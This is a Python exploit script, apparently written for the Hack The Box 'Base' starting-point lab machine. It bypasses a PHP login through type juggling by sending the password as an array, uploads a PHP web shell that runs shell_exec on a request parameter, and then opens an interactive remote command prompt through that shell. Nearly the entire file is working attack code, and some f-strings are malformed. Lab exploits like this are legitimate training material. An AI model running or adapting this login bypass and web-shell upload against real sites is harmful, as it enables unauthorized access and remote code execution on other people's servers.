1+ #!/usr/bin/python3
2+ import requests
3+ import sys
4+ import os
5+ import urllib3
6+ import re
7+
8+ requests .packages .urllib3 .disable_warnings (requests .packages .urllib3 .exceptions .InsecureRequestWarning )
9+
10+ class Interface ():
11+ def __init__ (self ):
12+ self .red = '\033 [91m'
13+ self .green = '\033 [92m'
14+ self .white = '\033 [37m'
15+ self .yellow = '\033 [93m'
16+ self .bold = '\033 [1m'
17+ self .end = '\033 [0m'
18+
19+ def header (self ):
20+ print ('\n >> Remote Code Execution (RCE) - Starting Point Base HTB' )
21+ print (' >> by twseptian\n ' )
22+
23+ def info (self , message ):
24+ print (f"[{ self .white } { self .end } { message } )
25+
26+ def warning (self , message ):
27+ print (f"[{ self .yellow } { self .end } { message } )
28+
29+ def error (self , message ):
30+ print (f"[{ self .red } { self .end } { message } )
31+
32+ def success (self , message ):
33+ print (f"[{ self .green } { self .end } { self .bold } { message } { self .end } )
34+
35+ # Instantiate our interface class
36+ global output
37+ output = Interface ()
38+ output .header ()
39+
40+ proxies = {'http' :'http://127.0.0.1:8080' ,'https' :'http://127.0.0.1:8080' }
41+ s = requests .Session ()
42+
43+ def bypass_login_page (url ):
44+ uri = "/login/login.php"
45+ headers = {"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" , "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" , "Accept-Language" : "en-US,en;q=0.5" , "Accept-Encoding" : "gzip, deflate" , "Content-Type" : "application/x-www-form-urlencoded" , "Connection" : "close" ,"Upgrade-Insecure-Requests" : "1" }
46+ data = {"username" : "admin" , "password[]" : "password" }
47+ response = s .post (url + uri , headers = headers , data = data , verify = False , proxies = proxies ,allow_redirects = True )
48+ login_acces = response .status_code
49+ if login_acces == 200 :
50+ return True
51+ else :
52+ return False
53+
54+ def upload_shell (url ):
55+ output .info ("Uploading PHP Shell..." )
56+ phpshell = {'image' : ( 'shell.php' , '<?php echo shell_exec($_REQUEST["cmd"]); ?>' , 'application/octet-stream' ,{'Content-Disposition' : 'form-data' })}
57+ response = s .post (url + '/upload.php' ,files = phpshell ,proxies = proxies )
58+ file_upload = response .status_code
59+ if file_upload == 200 :
60+ return True
61+ else :
62+ return False
63+
64+ def webshell (url ):
65+ try :
66+ WEB_SHELL = url + '/_uploaded/shell.php'
67+ getdir = {'cmd' : 'echo CMD' }
68+ r2 = requests .get (WEB_SHELL , params = getdir , verify = False , proxies = proxies )
69+ status = r2 .status_code
70+ if status != 200 :
71+ output .error ("Couldn't connect to the webshell" )
72+ r2 .raise_for_status ()
73+ output .success ("Successfully connected to webshell." )
74+ cwd = re .findall ('[CDEF].*' , r2 .text )
75+ cwd = "\033 [91m" + cwd [0 ]+ "\033 [0m> "
76+ term = cwd
77+ while True :
78+ thought = input (term )
79+ command = {'cmd' : thought }
80+ r2 = requests .get (WEB_SHELL , params = command , verify = False )
81+ status = r2 .status_code
82+ if status != 200 :
83+ r2 .raise_for_status ()
84+ response2 = r2 .text
85+ print (response2 )
86+ except :
87+ print ("\r \n " ); output .warning ("Existing." )
88+ sys .exit (- 1 )
89+
90+ def main ():
91+ if len (sys .argv ) != 2 :
92+ output .info ("Usage: %s <url>" % sys .argv [0 ])
93+ output .info ("Example: %s www.example.com" % sys .argv [0 ])
94+ sys .exit (- 1 )
95+
96+ url = sys .argv [1 ]
97+ output .info ("Bypass Login page using PHP Juggling..." )
98+ login_access = bypass_login_page (url )
99+ if login_access :
100+ output .success ("Get Login Access" )
101+ file_upload = upload_shell (url )
102+ if file_upload :
103+ output .success ("PHP Shell has been uploaded successfully" )
104+ webshell (url )
105+ else :
106+ output .error ("Failed to upload PHP Shell" )
107+ else :
108+ output .error ("Failed to bypass login page" )
109+
110+ if __name__ == "__main__" :
111+ main ()
0 commit comments